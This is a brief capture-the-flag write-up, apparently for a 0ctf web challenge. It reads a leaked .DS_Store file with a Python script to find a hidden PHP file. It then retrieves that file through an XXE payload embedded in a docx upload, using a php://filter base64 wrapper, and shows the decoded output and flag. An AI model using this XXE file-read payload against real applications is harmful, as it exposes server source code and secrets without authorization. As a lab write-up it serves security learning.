Home In the description and task title, it states that the developer uses a Mac Book Pro. So we looked for the .DS_Store in the application root directory and found one whose contents we can read with this simple python script:

from ds_store import DSStore  
with DSStore.open('DS_Store', 'r+') as d:  
    for i in d:
        print i


<index.php Iloc>  
<parse.class.php Iloc>  
<u_can_not_guess_this_haha.php Iloc>  

It seems the flag is in u_can_not_guess_this_haha.php but the page renders an empty page. Probably flag is in the code.

The site lets us upload an image and a document. There is no control of the file type nor the extension for the image so we can upload any file to /uploads but that doesnt turn out to be very useful.

We can also upload profile descriptions in docx format which is basically a bunch of XML docs zipped. It turns out the application process the XML files without disabling external entities and so its vulnerable to XXE. We prepared a specially crafted docx document to retrieve the u_can_not_guess_this_haha.php file in base64 format (so we have no problems with <> characters:

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>  
<!DOCTYPE document [<!ENTITY xxx SYSTEM "php://filter/read=convert.base64-encode/resource=u_can_not_guess_this_haha.php">]>  
<w:document> ... </w:document>  


PD9waHAgLy9mbGFnIDBjdGZ7eTB1X2ZpbmRfbTNfQmFkX2d1WX0=<br />  

FLAG is: 0ctf{y0u_find_m3_Bad_guY}